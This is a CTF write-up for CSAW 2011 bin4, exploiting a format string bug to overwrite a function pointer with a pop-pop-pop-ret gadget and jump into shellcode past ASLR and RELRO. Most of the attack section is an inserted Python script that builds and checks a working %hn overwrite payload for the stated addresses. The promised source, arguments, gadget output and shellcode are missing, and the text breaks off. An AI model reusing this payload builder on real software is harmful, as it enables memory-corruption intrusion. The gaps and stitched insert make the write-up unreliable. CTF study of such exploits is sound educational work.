CSAW CTF 2011 Write-up: Exploitation bin4

This challenge shares its source code with the bin2 challenge, but the environment is different:
ASLR is enabled, and because the binary is built with RELRO (full RELRO, since the GOT is protected as well) we can overwrite neither the GOT nor the .dtors section.
We will bypass those protections with a ROP approach.

Here is the source code:

As we can see there is a format string vulnerability: snprintf is called with user-controlled input as its format argument instead of a fixed format string.
Our target is the opfunc function pointer. It is stored in the .bss section, and since the binary is not position independent, .bss sits at a fixed address even with ASLR enabled.
We can find opfunc at 0x0804a010.

Thus we can call our binary with these arguments:

and our format string will be evaluated.

Now we know how and where to write in memory, but what do we want to write?
Since we want to ROP, we first check what is on the stack right before the call through opfunc.

The pointer to our string is at $esp+8: it was pushed on the stack as an argument right before the snprintf call (at 0x08048669), and $esp+8 has not been altered since.
But when the program calls the requested operation through opfunc, the call instruction pushes its return address, so inside the called function the pointer to our string will be at $esp+12.

All we need now is a pop-pop-pop-ret gadget: the three pops discard 12 bytes of stack, so the ret pops the pointer at $esp+12 and jumps straight into our string (the memory holding the string has to be executable for this to work).
Luckily we don’t even have to search much:

So all we need to do is to put our shellcode after the operation symbol and write 0x080486e1 into opfunc.
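The following is an added example, not code from the write-up: it builds the format string that plants the gadget address 0x080486e1 into opfunc at 0x0804a010 with two %hn half-word writes, and replays it through a minimal model of how printf counts characters and applies %n/%hn stores, so the payload can be checked before touching the binary. The vararg position of our string (ARG_OFFSET = 7, i.e. "%7$x" would print its first four bytes) is an assumption; the page does not show it, and in practice it is found by printing "%1$x %2$x ..." and spotting the string's own bytes. The two target addresses are placed at the front of the string, which works here because neither contains a null byte (argv strings cannot). Note that glibc's snprintf keeps counting past the destination size, so %n/%hn still see the full padding count even when the output buffer is smaller than the padding.

```python
import re
import struct

# Addresses from the write-up: opfunc in the non-PIE binary's .bss, and the
# pop-pop-pop-ret gadget we want stored there.
OPFUNC_ADDR = 0x0804A010
GADGET_ADDR = 0x080486E1

# Assumption (not on the page): the first four bytes of our string are the
# 7th vararg of the vulnerable snprintf, so "%7$x" would print them.
ARG_OFFSET = 7


def build_fmt_write(addr, value, arg_offset, already_written=0):
    """Format string that stores the 32-bit `value` at `addr` using two %hn
    (16-bit) writes. The two target addresses are placed at the front of the
    string so they are reachable as varargs arg_offset and arg_offset+1."""
    lo = value & 0xFFFF
    hi = (value >> 16) & 0xFFFF
    payload = struct.pack("<II", addr, addr + 2)
    written = already_written + len(payload)
    # Emit the smaller half first so every padding width is non-negative; the
    # counter only has to match modulo 0x10000 because %hn stores 16 bits.
    for target, idx in sorted([(lo, arg_offset), (hi, arg_offset + 1)]):
        pad = (target - written) % 0x10000
        if pad:
            payload += b"%%%dc" % pad      # "%<pad>c": emits pad characters
            written += pad
        payload += b"%%%d$hn" % idx        # "%<idx>$hn": store low 16 bits of count
    return payload


# Only the directives the payload uses (plus %x for leak-style probing).
DIRECTIVE = re.compile(rb"%(?:(\d+)\$)?(\d*)(hn|n|c|x)")


def simulate_printf(fmt, varargs, memory):
    """Replay `fmt` the way printf counts output and apply %n / %hn stores
    into `memory` (dict: address -> byte). `varargs[i]` is the i-th 32-bit
    vararg, 1-based like "%i$"; index 0 is unused. Returns the character count."""
    count = 0
    next_arg = 1
    pos = 0
    while pos < len(fmt):
        if fmt[pos:pos + 1] != b"%":
            count += 1                     # literal byte: one character of output
            pos += 1
            continue
        m = DIRECTIVE.match(fmt, pos)
        if not m:
            raise ValueError("unsupported directive at offset %d" % pos)
        explicit, width, conv = m.groups()
        if explicit:
            idx = int(explicit)
        else:
            idx = next_arg                 # non-positional directives consume in order
            next_arg += 1
        arg = varargs[idx]
        width = int(width) if width else 0
        if conv == b"c":
            count += max(width, 1)
        elif conv == b"x":
            count += max(width, len("%x" % arg))
        elif conv == b"hn":
            memory[arg] = count & 0xFF
            memory[arg + 1] = (count >> 8) & 0xFF
        else:                              # b"n": full 32-bit store
            for i in range(4):
                memory[arg + i] = (count >> (8 * i)) & 0xFF
        pos = m.end()
    return count


def read_u32(memory, addr):
    return int.from_bytes(bytes(memory.get(addr + i, 0) for i in range(4)), "little")


def demo(value=GADGET_ADDR):
    """Build the opfunc overwrite and check it against the simulator.
    Returns (payload, characters printed, 32-bit word now stored at opfunc)."""
    payload = build_fmt_write(OPFUNC_ADDR, value, ARG_OFFSET)
    # Constructed stack: filler below our string, then the payload's own first
    # eight bytes as varargs ARG_OFFSET and ARG_OFFSET+1, as the binary sees them.
    words = [0] + [0x41414141] * (ARG_OFFSET - 1)
    words += list(struct.unpack("<II", payload[:8]))
    memory = {}
    count = simulate_printf(payload, words, memory)
    return payload, count, read_u32(memory, OPFUNC_ADDR)


if __name__ == "__main__":
    payload, count, stored = demo()
    print(payload, count, hex(stored))
```

Once the real vararg offset is known, the payload bytes go where the write-up's arguments put the format string; the simulator is only a sanity check that the two counts land on the right halves, it does not model the rest of the binary's stack.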

This leads to the shellcode:
